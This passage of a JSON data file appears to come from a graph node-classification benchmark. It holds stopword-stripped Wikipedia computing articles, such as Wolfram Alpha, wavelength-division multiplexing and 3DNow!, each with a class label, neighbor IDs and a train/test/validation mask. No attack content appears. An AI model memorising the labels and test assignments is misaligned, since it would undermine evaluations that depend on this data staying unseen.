    "text": "Visual_IRC:visual irc visual irc virc open-source internet relay chat client windows operating system unlike many irc clients nearly functionality virc driven included irc script result program behavior extended changed without altering source code much source code birc virc 2 related utilities released gpl project web site sourceforge versus scripting language originally developed irc client bisual irc currently used visual irc similar many ways scripting languages used ircii mirc well tcl c. name versus chosen could shortened vs common abbreviation vircscript language used visual irc '96 '98 versus remained mostly backward compatible vircscript existing documentation commentary mentioned vs remained mostly accurate applied versus name also alluded birc origins replacement virc object versus ovs refers object-oriented features versus scripts define classes work objects methods instead textual data aliases however practice ovs mostly used manipulate vcl objects make virc interface scripts stored files usually .vsc file extension though .lib extension sometimes used versus script file simply contains statements interpreted script loaded blocks defined script see replace blocks defined name previous scripts aliases methods including constructors destructors events menu items toolbar items referred routines code blocks hello world code example example count ten example make everyone current channel operator",
    "neighbors": [
      5760,
      5251,
      6797,
      5397,
      7983,
      692,
      7861,
      9780,
      7612,
      5199,
      2387,
      3030,
      7894,
      7384,
      1501,
      2409,
      5612,
      2804,
      2556,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 5317,
    "label": 9,
    "text": "Mary_Kenneth_Keller:mary kenneth keller mary kenneth keller b.v.m december 17 1913 – january 10 1985 american roman catholic religious sister educator pioneer computer science irving c. tang first two people earn doctorate computer science united states keller born cleveland ohio december 17 1913 john adam keller catherine josephine née sullivan keller entered sisters charity blessed virgin mary 1932 took vows religious congregation 1940 completed b.s bachelor science mathematics 1943 m.s master science mathematics physics 1953 depaul university chicago keller earned ph.d. university wisconsin–madison 1965 dissertation inductive inference computer generated patterns focused constructing algorithms performed analytic differentiation algebraic expression written cdc fortran 63 throughout keller graduate studies affiliated various institutions including university michigan purdue dartmouth 1958 keller began working national science foundation workshop computer science center dartmouth college male-only institution time participated implementation basic programming language john g. kemeny thomas e. kurtz keller believed potential computers increase access information promote education finishing doctorate 1965 keller founded computer science department clarke college clarke university catholic women college founded sisters charity blessed virgin mary dubuque iowa year national science foundation awarded grant 25,000 payable two years instructional equipment undergraduate education one first computer science departments small college keller directed department twenty years clarke college keller computer center information services named provides computing telecommunication support clarke college students faculty members staff college also established mary kenneth keller computer science scholarship honor keller advocate involvement women computing use computers education helped establish association small computer users education ascue went write four books field acm/sigucc user services conference 1975 keller declared fully used computer greatest interdisciplinary tool invented date keller died january 10 1985 age 71",
    "neighbors": [
      11328,
      9644
    ],
    "mask": "None"
  },
  {
    "node_id": 5318,
    "label": 3,
    "text": "Pilot_1000:pilot 1000 pilot 1000 pilot 5000 first generations pdas produced palm computing subsidiary u.s. robotics introduced march 1996 pilot uses motorola 68328 processor 16 mhz 128 kb pilot 1000 512 kb pilot 5000 built random-access memory pda plastic case various colors dimensions 120x80x18 mm weight 160 grams pilot 160x160 pixel monochrome lcd tactile panel graffiti input zone presented bottom third screen underneath screen sits green on/off button four applications buttons date book address book list memo pad two scroll buttons left contrast control right top stylus slot back device memory slot door reset button battery compartment held two aaa batteries serial port use palmpilot cradle memory kept memory slot plastic cover back top pda 512 kb rom chip stores palm os 1.0 resident applications ram available 128 kb 512 kb 1 mb palmpilot professional memory card 2 mb ram hardware limit 12 mb ram 4 mb rom calibration test presented initial power pilot would boot ready use synchronization connecting synchronizing pda initially done utility called pilot desktop pc pilot desktop distributed either 3½ inch disk cd-rom according original floppy disk set v1.0 windows 95 included tutorial disk two win32s disks windows 3.1 v2.0 windows 95 windows nt version pilot desktop renamed palm desktop exists use mac platform open source support exists use linux distributions one preferred development platforms palm os well palm inc. sued pilot pen company using name pilot palm later involved legal battle xerox filed suit david goldberg unistroke patent",
    "neighbors": [
      2308,
      10500,
      6790,
      8976,
      3606,
      8982,
      6178,
      5164,
      7983,
      9013,
      694,
      823,
      6984,
      3017,
      8136,
      11337,
      9037,
      2383,
      2258,
      2259,
      1621,
      4832,
      4449,
      2285,
      1776,
      2420,
      8952,
      2811,
      9598
    ],
    "mask": "None"
  },
  {
    "node_id": 5319,
    "label": 8,
    "text": "Wolfram_Alpha:wolfram alpha wolfram|alpha also styled wolframalpha wolfram alpha computational knowledge engine answer engine developed wolfram alpha llc subsidiary wolfram research online service answers factual queries directly computing answer externally sourced curated data rather providing list documents web pages might contain answer search engine might wolfram|alpha released may 18 2009 based wolfram earlier flagship product wolfram mathematica computational platform toolkit encompasses computer algebra symbolic numerical computation visualization statistics capabilities additional data gathered academic commercial websites cia world factbook united states geological survey cornell university library publication called birds chambers biographical dictionary dow jones catalogue life crunchbase best buy faa optionally user facebook account users submit queries computation requests via text field wolfram|alpha computes answers relevant visualizations knowledge base curated structured data come sites books site use portfolio automated manual methods including statistics visualization source cross-checking expert review curated data makes alpha different semantic search engines index large number answers try match question one wolfram|alpha provide robust query results based computational facts queries social sciences cultural studies even many questions history responses require subtlety complexity able respond particularly-phrased natural language fact-based questions mary robinson born complex questions old queen elizabeth ii 1974 displays input interpretation question using standardized phrases age queen elizabeth ii royalty 1974 answer age start 1974 47 years biography link wolfram|alpha answer queries require narrative response difference julian gregorian calendars answer factual computational questions june 1 julian calendar mathematical symbolism parsed engine typically responds numerical results example lim x- 0 sin x /x yields correct limiting value 1 well plot 235 terms taylor series registered users possible derivation using l'hôpital rule also able perform calculations data using one source example fifty-second smallest country gdp per capita yields nicaragua 1160 per year wolfram|alpha written 15 million lines wolfram language code runs 10,000 cpus database currently includes hundreds datasets current historical weather datasets accumulated several years curated distinct auto-generated datasets checked quality either scientist expert relevant field someone acting clerical capacity simply verifies datasets acceptable one example live dataset wolfram|alpha use profile facebook user inputting facebook report query user authorizes facebook share account details wolfram site alpha generate personal analytics report containing age distribution friends frequency words used status updates detailed information within two weeks launching facebook analytics service september 2012 400,000 users used downloadable query results behind pay wall summaries accessible free accounts wolfram|alpha short answers api wolfram|alpha simple api wolfram|alpha spoken results api wolfram|alpha full results api wolfram|alpha conversational api wolfram|alpha fast query recognizer api wolfram|alpha summary box api wolfram|alpha instant calculators api wolfram|alpha show steps api wolfram|alpha used power searches microsoft bing duckduckgo search engines first release july 21 2017 brave web browser features wolfram|alpha one default search engines factual question answering also queried apple siri amazon alexa samsung voice dexetra iris voice control software blackberry 10 launch preparations began may 15 2009 7 pm cdt broadcast live justin.tv plan publicly launch service hours later expected issues due extreme load service officially launched may 18 2009 wolfram|alpha received mixed reviews wolfram|alpha advocates point potential even stating determines results important current usefulness december 3 2009 iphone app introduced users considered initial 50 price ios app unnecessarily high since features could freely accessed using web browser instead also complained simultaneous removal mobile formatting option site wolfram responded lowering price 2 offering refund existing customers re-instating mobile site october 6 2010 android version app released available kindle fire nook nook version available outside u.s. 71 apps available use wolfram|alpha engine specialized tasks june 18 2018 japanese version wolfram|alpha released february 8 2012 wolfram|alpha pro released offering users additional features monthly subscription fee key feature ability upload automatic analysis many common file types data including raw tabular data images audio xml dozens specialized scientific medical mathematical formats features include extended keyboard interactivity cdf data downloads in-depth step-by-step solution ability customize save graphical tabular results extra computation time changes free version site time wolfram|alpha pro launched wolfram alpha enterprise business-focused analytics tool released 2016 program combines data supplied corporation algorithms wolfram|alpha answer questions related corporation infoworld published article warning readers potential implications giving automated website proprietary rights data generates free software advocate richard stallman also opposes idea recognizing site copyright holder suspects wolfram would able make case existing copyright law",
    "neighbors": [
      4995,
      9732,
      6408,
      10506,
      4624,
      11538,
      8085,
      7069,
      1443,
      11555,
      6827,
      5830,
      7885,
      10452,
      735,
      8421,
      8046,
      3567,
      3698
    ],
    "mask": "Test"
  },
  {
    "node_id": 5320,
    "label": 1,
    "text": "SQL_Server_Integration_Services:sql server integration services sql server integration services ssis component microsoft sql server database software used perform broad range data migration tasks ssis platform data integration workflow applications features data warehousing tool used data extraction transformation loading etl tool may also used automate maintenance sql server databases updates multidimensional cube data first released microsoft sql server 2005 ssis replaced data transformation services feature sql server since version 7.0 unlike dts included versions ssis available standard business intelligence enterprise editions microsoft visual studio dev essentials possible learn use ssis visual studio 2017 free development learning purposes ssis import/export wizard lets user create packages move data single data source destination transformations wizard quickly move data variety source types variety destination types including text files sql server instances developers tasked creating maintaining ssis packages use visual development tool based microsoft visual studio called sql server business intelligence development studio bids allows users edit ssis packages using drag-and-drop user interface scripting environment write programming code also available tool package holds variety elements define workflow upon package execution tool provides color-coded real-time monitoring note recent versions ms sql server bids replaced sql server data tools business intelligence ssdt-bi package may saved file store hierarchical namespace within sql server instance either case package content persisted xml completed designer also allows user start package execution started package may readily debugged monitored ssis provides following built-in transformations conditional split transformation used conditionally route rows transformation objects based particular condition similar codice_1 construct c language aside import/export wizard designer product includes notable tools dtexec executes package command line wherever may stored running package tool may instructed apply configuration information allow package reused slightly different parameters including different connection strings endpoints dtutil provides ability manage packages command prompt tool copy move package file server store back among sundry functions used delete rename encrypt decrypt packages users may write code define connection objects log providers transforms tasks ssis features programmable object model allows developers write hosts package execution host respond events start stop packages object model also allows developers create store load packages well create destroy modify contained objects within limits ssis packages load call cli assembly dlls providing access virtually kind operation permissible .net clr ssis used sql server 2005 2008 2008 r2 2012 2014 2016 editions except express workgroup",
    "neighbors": [
      2691,
      6797,
      10900,
      10902,
      11030,
      3224,
      5401,
      7064,
      11414,
      5151,
      5794,
      8227,
      11559,
      4010,
      1964,
      10157,
      7983,
      11570,
      11571,
      6709,
      315,
      847,
      83,
      2901,
      1366,
      7767,
      479,
      608,
      2401,
      3303,
      9205,
      2943
    ],
    "mask": "None"
  },
  {
    "node_id": 5321,
    "label": 5,
    "text": "Wavelength-division_multiplexing:wavelength-division multiplexing fiber-optic communications wavelength-division multiplexing wdm technology multiplexes number optical carrier signals onto single optical fiber using different wavelengths i.e. colors laser light technique enables bidirectional communications one strand fiber well multiplication capacity term wdm commonly applied optical carrier typically described wavelength whereas frequency-division multiplexing typically applies radio carrier often described frequency purely conventional wavelength frequency communicate information specifically frequency hertz cycles per second multiplied wavelength physical length one cycle equals velocity carrier wave vacuum velocity light usually denoted lower case letter c. glass fiber substantially slower usually 0.7 times c. data rate ideally might carrier frequency practical systems always fraction carrier frequency wdm system uses multiplexer transmitter join several signals together demultiplexer receiver split apart right type fiber possible device simultaneously function optical add-drop multiplexer optical filtering devices used conventionally etalons stable solid-state single-frequency fabry–pérot interferometers form thin-film-coated optical glass three different wdm types whereof one called wdm notation xwdm normally used discussing technology concept first published 1978 1980 wdm systems realized laboratory first wdm systems combined two signals modern systems handle 160 signals thus expand basic 100 gbit/s system single fiber pair 16 tbit/s system 320 channels also present 12.5 ghz channel spacing see wdm systems popular telecommunications companies allow expand capacity network without laying fiber using wdm optical amplifiers accommodate several generations technology development optical infrastructure without overhaul backbone network capacity given link expanded simply upgrading multiplexers demultiplexers end often done use optical-to-electrical-to-optical o/e/o translation edge transport network thus permitting interoperation existing equipment optical interfaces wdm systems operate single-mode fiber optical cables core diameter 9 µm certain forms wdm also used multi-mode fiber cables also known premises cables core diameters 50 62.5 µm early wdm systems expensive complicated run however recent standardization better understanding dynamics wdm systems made wdm less expensive deploy optical receivers contrast laser sources tend wideband devices therefore demultiplexer must provide wavelength selectivity receiver wdm system wdm systems divided three different wavelength patterns normal wdm coarse cwdm dense dwdm normal wdm sometimes called bwdm uses two normal wavelengths 1310 1550 one fiber coarse wdm provides 16 channels across multiple transmission windows silica fibers dense wdm dwdm uses c-band 1530 nm-1565 nm transmission window denser channel spacing channel plans vary typical dwdm system would use 40 channels 100 ghz spacing 80 channels 50 ghz spacing technologies capable 12.5 ghz spacing sometimes called ultra dense wdm new amplification options raman amplification enable extension usable wavelengths l-band 1565 nm-1625 nm less doubling numbers coarse wavelength division multiplexing cwdm contrast dwdm uses increased channel spacing allow less-sophisticated thus cheaper transceiver designs provide 16 channels single fiber cwdm uses entire frequency band spanning second third transmission windows 1310/1550 nm respectively including critical frequencies oh scattering may occur oh-free silica fibers recommended wavelengths second third transmission windows used avoiding region channels 47 49 51 53 55 57 59 61 remain commonly used os2 fibers water peak problem overcome possible 18 channels used wdm cwdm dwdm based concept using multiple wavelengths light single fiber differ spacing wavelengths number channels ability amplify multiplexed signals optical space edfa provide efficient wideband amplification c-band raman amplification adds mechanism amplification l-band cwdm wideband optical amplification available limiting optical spans several tens kilometres originally term coarse wavelength division multiplexing cwdm fairly generic described number different channel configurations general choice channel spacings frequency configurations precluded use erbium doped fiber amplifiers edfas prior relatively recent itu standardization term one common definition cwdm two signals multiplexed onto single fiber one signal 1550 nm band 1310 nm band 2002 itu standardized channel spacing grid cwdm itu-t g.694.2 using wavelengths 1270 nm 1610 nm channel spacing 20 nm itu g.694.2 revised 2003 shift channel centers 1 nm strictly speaking center wavelengths 1271 1611 nm many cwdm wavelengths 1470 nm considered unusable older g.652 specification fibers due increased attenuation 1270–1470 nm bands newer fibers conform g.652.c g.652.d standards corning smf-28e samsung widepass nearly eliminate water peak attenuation peak allow full operation 18 itu cwdm channels metropolitan networks main characteristic recent itu cwdm standard signals spaced appropriately amplification edfas limits total cwdm optical span somewhere near 60 km 2.5 gbit/s signal suitable use metropolitan applications relaxed optical frequency stabilization requirements allow associated costs cwdm approach non-wdm optical components cwdm used cable television networks different wavelengths used downstream upstream signals systems wavelengths used often widely separated example downstream signal might 1310 nm upstream signal 1550 nm gbic small form factor pluggable sfp transceivers utilize standardized cwdm wavelengths gbic sfp cwdm optics allow legacy switch system converted enable wavelength multiplexed transport fiber selecting compatible transceiver wavelengths use inexpensive passive optical multiplexing device 10gbase-lx4 10 gbit/s physical layer standard example cwdm system four wavelengths near 1310 nm carrying 3.125 gigabit-per-second gbit/s data stream used carry 10 gbit/s aggregate data passive cwdm implementation cwdm uses electrical power separates wavelengths using passive optical components bandpass filters prisms many manufacturers promoting passive cwdm deploy fiber home dense wavelength division multiplexing dwdm refers originally optical signals multiplexed within 1550 nm band leverage capabilities cost erbium doped fiber amplifiers edfas effective wavelengths approximately 1525–1565 nm c band 1570–1610 nm l band edfas originally developed replace sonet/sdh optical-electrical-optical oeo regenerators made practically obsolete edfas amplify optical signal operating range regardless modulated bit rate terms multi-wavelength signals long edfa enough pump energy available amplify many optical signals multiplexed amplification band though signal densities limited choice modulation format edfas therefore allow single-channel optical link upgraded bit rate replacing equipment ends link retaining existing edfa series edfas long haul route furthermore single-wavelength links using edfas similarly upgraded wdm links reasonable cost edfa cost thus leveraged across many channels multiplexed 1550 nm band stage basic dwdm system contains several main components introduction itu-t g.694.1 frequency grid 2002 made easier integrate wdm older standard sonet/sdh systems wdm wavelengths positioned grid exactly 100 ghz 0.8 nm spacing optical frequency reference frequency fixed 193.10 thz 1,552.52 nm main grid placed inside optical fiber amplifier bandwidth extended wider bandwidths first commercial deployment dwdm made ciena corporation sprint network june 1996 today dwdm systems use 50 ghz even 25 ghz channel spacing 160 channel operation dwdm systems maintain stable wavelength frequency needed cwdm closer spacing wavelengths precision temperature control laser transmitter required dwdm systems prevent drift narrow frequency window order ghz addition since dwdm provides greater maximum capacity tends used higher level communications hierarchy cwdm example internet backbone therefore associated higher modulation rates thus creating smaller market dwdm devices high performance factors smaller volume higher performance result dwdm systems typically expensive cwdm recent innovations dwdm transport systems include pluggable software-tunable transceiver modules capable operating 40 80 channels dramatically reduces need discrete spare pluggable modules handful pluggable devices handle full range wavelengths stage details concerning wavelength-converting transponders discussed clarify role played current dwdm technology additional optical transport layer also serve outline evolution systems last 10 years stated wavelength-converting transponders served originally translate transmit wavelength client-layer signal one dwdm system internal wavelengths 1,550 nm band note even external wavelengths 1,550 nm likely need translated almost certainly required frequency stability tolerances optical power necessary system edfa mid-1990s however wavelength converting transponders rapidly took additional function signal regeneration signal regeneration transponders quickly evolved 1r 2r 3r overhead-monitoring multi-bitrate 3r regenerators differences outlined mentioned intermediate optical amplification sites dwdm systems may allow dropping adding certain wavelength channels systems deployed august 2006 done infrequently adding dropping wavelengths requires manually inserting replacing wavelength-selective cards costly systems requires active traffic removed dwdm system inserting removing wavelength-specific cards interrupts multi-wavelength optical signal roadm network operators remotely reconfigure multiplexer sending soft commands architecture roadm dropping adding wavelengths interrupt pass-through channels numerous technological approaches utilized various commercial roadms tradeoff cost optical power flexibility network topology mesh nodes interconnected fibers form arbitrary graph additional fiber interconnection device needed route signals input port desired output port devices called optical crossconnectors oxcs various categories oxcs include electronic opaque optical transparent wavelength selective devices cisco enhanced wdm system combines 1 gb coarse wave division multiplexing cwdm connections using sfps gbics 10 gb dense wave division multiplexing dwdm connections using xenpak x2 xfp dwdm modules dwdm connections either passive boosted allow longer range connection addition cfp modules deliver 100 gbit/s ethernet suitable high speed internet backbone connections shortwave wdm uses vertical-cavity surface-emitting laser vcsel transceivers four wavelengths 846 953 nm range single om5 fiber 2-fiber connectivity om3/om4 fiber see also transponders optical communications different functional views meaning optical transponders several simulation tools used design wdm systems",
    "neighbors": [
      10112,
      2306,
      388,
      8708,
      3847,
      2057,
      1550,
      7698,
      11288,
      2458,
      5020,
      5664,
      1192,
      1320,
      3754,
      7723,
      11181,
      1967,
      10799,
      1969,
      2994,
      6834,
      9793,
      7490,
      3140,
      9284,
      11591,
      7498,
      9675,
      7641,
      2911,
      3168,
      2273,
      2785,
      5092,
      5863,
      7400,
      2802,
      6267
    ],
    "mask": "Test"
  },
  {
    "node_id": 5322,
    "label": 2,
    "text": "Cisco_NX-OS:cisco nx-os nx-os network operating system nexus-series ethernet switches mds-series fibre channel storage area network switches made cisco systems evolved cisco operating system san-os originally developed mds switches based wind river linux inter-operable cisco operating systems command-line interface nx-os similar cisco ios recent nx-os cisco-style cli bash shell available nx-os 7.0 3 i3 output codice_1 codice_2 command line argument might look like text 4.1 4.2 5.0 5.1 5.2 6.0 6.1 6.2 7.0 9.2",
    "neighbors": [
      2179,
      4611,
      2825,
      1814,
      1436,
      3742,
      5028,
      7082,
      3885,
      686,
      7983,
      6834,
      7863,
      3007,
      9279,
      10303,
      10433,
      5959,
      9927,
      11086,
      1743,
      7887,
      10451,
      9048,
      1754,
      1115,
      5978,
      10341,
      11112,
      9080
    ],
    "mask": "None"
  },
  {
    "node_id": 5323,
    "label": 9,
    "text": "Swing_Application_Framework:swing application framework swing application framework jsr 296 java specification simple application framework swing applications graphical user interface gui computer software defines infrastructure common desktop applications making swing applications easier create withdrawn jsr 296 specification defines basic structure swing application defines framework small set extensible classes define infrastructure common desktop applications development open-source reference implementation called appframework began 2006 originally expected implementation would means integrating jsr 296 upcoming java se 7 dolphin version java project scheduled included milestone 5 java development kit jdk7 development however august 2009 announced project would included due inability reconcile design flaws achieve consensus among jsr 296 team milestone 5 deadline original swing application framework implementation put hold indefinitely later withdrawn spec lead request june 2011 last public release appframework project version 1.03 several forks original implementation started open-source communities several application framework libraries created achieve goals similar jsr 296 last release bsaf 1.9.1 2012 bsaf still available sourceforge button says project found takes defunct project kenai",
    "neighbors": [
      4960,
      6338,
      3562,
      5677,
      11221
    ],
    "mask": "Test"
  },
  {
    "node_id": 5324,
    "label": 5,
    "text": "Object_Desktop:object desktop object desktop od previously object desktop network odnt online software subscription service created stardock os/2 relaunched windows 1997 object desktop includes graphical user interface customization productivity products offered stardock including windowblinds fences desktopx tweak7 iconpackager objectbar object desktop — initially entitled workplace toolset/2 — developed three years brad wardell kurt westerfeld subsequent stardock os/2 essentials pre-registered set os/2 shareware object desktop 1.0 followed 1.5 professional versions following short order 1997 os/2 isv market flagging many customers switching windows nt 4 1997 os/2 revenues 33 1996 fell 25 1996 levels 1998 led decision switch windows mid-1997 nevertheless stardock remained os/2 isv february 2001 stopped selling object desktop os/2 os/2 versions sold initial versions upgrades costing later windows versions due lower volume sales initial release object desktop praised functionality criticised performance compatibility issues object desktop 1.5 released 2 may 1996 fixing many problems adding following components users 1.0 could upgrade 37 object desktop professional name suggests aimed professional users os/2 released 24 august 1996 priced 179 users could also upgrade od 1.5 69.95 od 1.0 119 addition features od 1.5 package included object desktop 2.0 update previously released components integration professional features main package priced 99.95 users object desktop professional could upgrade 39 versions could upgraded 69.95 upgrade 2.02 released start 2000 made clear would last release became clear os/2 would remain viable platform stardock decided move windows required rewriting old components writing new ones replace appropriate windows would take time stardock needed money immediately sustain development cope cashflow problem object desktop users switched os/2 windows asked purchase windows subscriptions advance actual software understanding subscription period would begin software reasonably complete ended december 1999 program called early experience program due significant goodwill built previous years many signed stardock survived initially new object desktop package closely related os/2 versions old favourites like object edit control center task/tab launchpad ported however userbase expanded traditional core technical users wider windows market newer components shifted focus customizing graphical user interface flagship component object desktop became windowblinds popular additions iconpackager objectbar desktopx deskscapes fences impulse preceded component manager stardock central main interface registering downloading updating components roughly equivalent package manager users pay initial fee access software one year access download updates may also download new components added subscription period updates guaranteed components deemed less relevant may passed removed expiry users download software renew however lose use released non-beta software already downloaded necessary renew immediately renewals add year access date renewal expiry date historically initial subscription fee windows version object desktop 49.95 year renewal upgrade standalone component 34.95 object desktop 2008 introduced two tiers lower tier 49.95 higher tier 69.95 latter eliminated 2010 object desktop works component model many programs available separately subscribers use components available object desktop subscribers february 2010 components may remain available legacy subscribers offered new users components withdrawn service make past beta stages components brought forth windows version object desktop occasional complaint subscription model subscriber favourite component updated recently may left beta long time hand popular components windowblinds tend frequently updated beta releases every week two release versions new features every months major version changes every year non-object desktop users said beta issue creates double standard forces people upgrade object desktop order get latest features stardock says policy due many standalone users expecting beta versions reliability release versions increased ease releasing build impulse separate installation package",
    "neighbors": [
      11270,
      5067,
      5324,
      6797,
      7983,
      3250,
      9780,
      7325
    ],
    "mask": "None"
  },
  {
    "node_id": 5325,
    "label": 4,
    "text": "Security_bug:security bug security bug security defect software bug exploited gain unauthorized access privileges computer system security bugs introduce security vulnerabilities compromising one security bugs need identified exploited qualify security bugs like software bugs stem root causes generally traced either absent inadequate security bugs generally fall fairly small number broad categories include see software security assurance",
    "neighbors": [
      5636,
      10756,
      9356,
      3473,
      8978,
      1688,
      5373,
      5246,
      10392,
      4892,
      2717,
      5404,
      2975,
      3871,
      1954,
      2213,
      8998,
      6184,
      939,
      5547,
      3629,
      9646,
      7855,
      9904,
      2737,
      1970,
      5433,
      7739,
      3262,
      9791,
      1474,
      3525,
      7368,
      9160,
      4435,
      1622,
      2262,
      9688,
      7515,
      3552,
      612,
      3941,
      6373,
      1129,
      107,
      11244,
      239,
      2041,
      7804,
      5245,
      2558,
      2815
    ],
    "mask": "Test"
  },
  {
    "node_id": 5326,
    "label": 3,
    "text": "3DNow!:3dnow 3dnow extension x86 instruction set developed advanced micro devices amd adds single instruction multiple data simd instructions base x86 instruction set enabling perform vector processing improves performance many graphic-intensive applications first microprocessor implement 3dnow amd k6-2 introduced 1998 application appropriate raised speed 2–4 times however instruction set never gained much popularity amd announced august 2010 support 3dnow would dropped future amd processors except two instructions codice_1 codice_2 instructions two instructions also available bay-trail intel processors 3dnow developed time 3d graphics becoming mainstream pc multimedia games realtime display 3d graphics depended heavily host cpu floating-point unit fpu perform floating-point calculations task amd k6 processor easily outperformed competitor intel pentium ii enhancement mmx instruction set 3dnow instruction-set augmented mmx simd registers support common arithmetic operations add/subtract/multiply single-precision 32-bit floating-point data software written use amd 3dnow instead slower x87 fpu could execute 4x faster depending instruction-mix first implementation 3dnow technology contains 21 new instructions support simd floating-point operations 3dnow data format packed single-precision floating-point 3dnow instruction set also includes operations simd integer operations data prefetch faster mmx-to-floating-point switching later intel would add similar incompatible instructions pentium iii known sse streaming simd extensions 3dnow floating-point instructions following 3dnow integer instructions following 3dnow performance-enhancement instructions following little evidence second version 3dnow ever officially given trade name led confusion documentation refers new instruction set common terms extended 3dnow enhanced 3dnow 3dnow+ phrase enhanced 3dnow found locations amd website capitalization enhanced appears either purely grammatical used emphasis processors may may extensions notable references benchmark page k6-iii-p extensions extension 3dnow instruction set introduced first-generation athlon processors athlon added 5 new 3dnow instructions 19 new mmx instructions later k6-2+ k6-iii+ targeted mobile market included 5 new 3dnow instructions leaving 19 new mmx instructions new 3dnow instructions added boost dsp new mmx instructions added boost streaming media 19 new mmx instructions subset intel sse1 instruction set amd technical manuals amd segregates instructions apart 3dnow extensions amd customer product literature however segregation less clear benefits 24 new instructions credited enhanced 3dnow technology led programmers come name 19 new mmx instructions common appears integer sse isse ssemmx mmx2 also found video filter documentation public domain sector also noted isse could also refer internet sse early name sse 3dnow extension dsp instructions following mmx extension instructions integer sse following 3dnow professional trade name used indicate processors combine 3dnow technology complete sse instructions set sse1 sse2 sse3 athlon xp first processor carry 3dnow professional trade name first product athlon family support complete sse1 instruction set total 21 original 3dnow instructions five 3dnow extension dsp instructions 19 mmx extension instructions 52 additional sse instructions complete sse1 compatibility geode gx geode lx added two new 3dnow instructions currently absent processors 3dnow professional instructions unique geode gx/lx following one advantage 3dnow possible add multiply two numbers stored register sse number combined number position another register capability known horizontal intel terminology major addition sse3 instruction set disadvantage 3dnow 3dnow instructions mmx instructions share register-file whereas sse adds 8 new independent registers codice_50–codice_51 mmx/3dnow registers shared standard x87 fpu 3dnow instructions x87 instructions executed simultaneously however aliased x87 fpu 3dnow mmx register states saved restored traditional x87 codice_52 codice_53 instructions arrangement allowed operating systems support 3dnow explicit modifications whereas sse registers required explicit operating system support properly save restore new xmm registers via added codice_54 codice_55 instructions fx* instructions upgrade older x87 save restore instructions could save sse register states also x87 register states hence meant could save mmx 3dnow registers amd athlon xp k8-based cores i.e athlon 64 assembly programmers noted possible combine 3dnow sse instructions reduce register pressure practice difficult improve performance due instructions executing shared functional units",
    "neighbors": [
      3459,
      8452,
      2821,
      1798,
      6151,
      4491,
      6924,
      1677,
      4237,
      6038,
      9369,
      9500,
      10270,
      9126,
      2088,
      7983,
      9391,
      9911,
      8120,
      8506,
      1085,
      8125,
      8126,
      833,
      7234,
      6596,
      9541,
      3142,
      977,
      2514,
      5844,
      9428,
      4603,
      8795,
      2655,
      1122,
      7783,
      10985,
      9964,
      1005,
      5358,
      9582,
      8944,
      1137,
      499,
      1399,
      9976,
      1915,
      10620,
      3070
    ],
    "mask": "None"
  },
  {
    "node_id": 5327,
    "label": 4,
    "text": "Security_Vision:security vision security vision – software meant automation information security management system isms organisation software kind representative security operations center soc functionality security vision renders information security processes comprising information security management system organization automatic compliance international information security management standards next security vision modules allow make automatic performance standard requirements following sections moment creation security vision software till creator system sticks three-level architecture – core level collection level management level core level – made collection analysis correlation events generated different sources events corporate network collection level – meant management level – made rendering information security management process automatic basically russian-speaking system management portal security vision software collects events generated process following information security information technology functioning regulatory requirements associated necessity system kind found mandatory legislation norms russian federation law well recommended international prescriptions economic sectors area regulatory security requirements industry standards international standards software core level comprises functionality stocktaking integrity control certified means 4 level control absence non-declared capabilities listed national catalog certified information security means federal office technical export control also used 2013 2012 2011 2010",
    "neighbors": [
      517,
      10245,
      6797,
      4755,
      1314,
      2213,
      3366,
      8998,
      7983,
      2737,
      5941,
      11594,
      4448,
      225,
      4194,
      9184,
      10213,
      4074,
      4725,
      5245
    ],
    "mask": "Train"
  },
  {
    "node_id": 5328,
    "label": 2,
    "text": "On-line_Debugging_Tool:on-line debugging tool on-line debugging tool odt used describe several debugger programs developed digital equipment corporation dec hardware various operating systems including os/8 rt-11 rsx-11 rsts/e implemented odt firmware console lsi-11-family processors including 11/03 11/23/24 11/53 11/73 11/83/84 debugger allowed access memory using octal addresses data within software systems debugger accessed process address space dec line pdp-11 processors implement virtual memory operating system perspective instead worked fixed address space mapped unified view program address space using active page register apr apr could map program ram increments 4k 16-bit words maximum 32k words apr could map 8 segments ram limited 4k structure maximum ram apr able map 32k 16-bit words case rsts/e usually meant runtime system rts mapped upper portion address space user program resided lower portion address space rts provided code support access operating system behalf user program rts stored non-static data address space user program rts typically read-only operating system loaded single copy rts mapped user program required rts apr would set map rts upper portion program address space 4k increments basic plus rts basic+ programming language typically mapped 16k user program mapped 4k increments lower 16k rt11 rts occupied 4k user program like rt11-based peripheral interchange program pip could expand maximum 28k odt could used patch binary modules like rts without requiring re-compilation binary source firmware console implementation accessed physical memory odt non-symbolic debugger implements similar functionality advanced debugger adb unix systems console odt replaced lights switches console many earlier processors access console odt obtained either power appropriate power mode selected execution halt instruction kernel mode use front panel halt switch button 1000/ xxxxxx 112737 lf deposits program deposit pc program counter sets pc start program deposit psw program status word locks interrupts effect write stream console check transmitter ready highly probable large number garbage characters displayed rsx-11m-plus odt essentially superset odt implementations odt implemented code linked task using task builder /da switch task built odt run odt invoked entry underscore standard odt prompt addresses odt debugger 16 bit addresses mode odt operating physical addresses used console odt pdp-8 os/8 operating system odt command invoked octal debugging technique tool subsequent pdp-11 odt programs non-symbolic could examine modify memory also set breakpoints",
    "neighbors": [
      1253,
      8876,
      7983,
      3216,
      11539,
      5492,
      6837,
      8732,
      10590
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5329,
    "label": 3,
    "text": "Instructions_per_cycle:instructions per cycle computer architecture instructions per cycle ipc commonly called instructions per clock one aspect processor performance average number instructions executed clock cycle multiplicative inverse cycles per instruction calculation ipc done running set piece code calculating number machine-level instructions required complete using high-performance timers calculate number clock cycles required complete actual hardware final result comes dividing number instructions number cpu clock cycles number instructions per second floating point operations per second processor derived multiplying number instructions per cycle clock rate cycles per second given hertz processor question number instructions per second approximate indicator likely performance processor number instructions executed per clock constant given processor depends particular software run interacts processor indeed entire machine particularly memory hierarchy however certain processor features tend lead designs higher-than-average ipc values presence multiple arithmetic logic units alu processor subsystem perform elementary arithmetic logical operations short pipelines comparing different instruction sets simpler instruction set may lead higher ipc figure implementation complex instruction set using chip technology however complex instruction set may able achieve useful work fewer instructions given level instructions per second achieved high ipc low clock speed like amd athlon early intel core series low ipc high clock speed like intel pentium 4 lesser extent amd bulldozer valid processor designs choice two often dictated history engineering constraints marketing pressures however high ipc high frequency always give best performance useful work done computer depends many factors besides processor speed factors include instruction set architecture processor microarchitecture computer system organization design disk storage system capabilities performance attached devices efficiency operating system importantly high-level design application software use users purchasers computer system instructions per clock particularly useful indication performance system accurate measure performance relevant application benchmarks much useful awareness existence useful provides 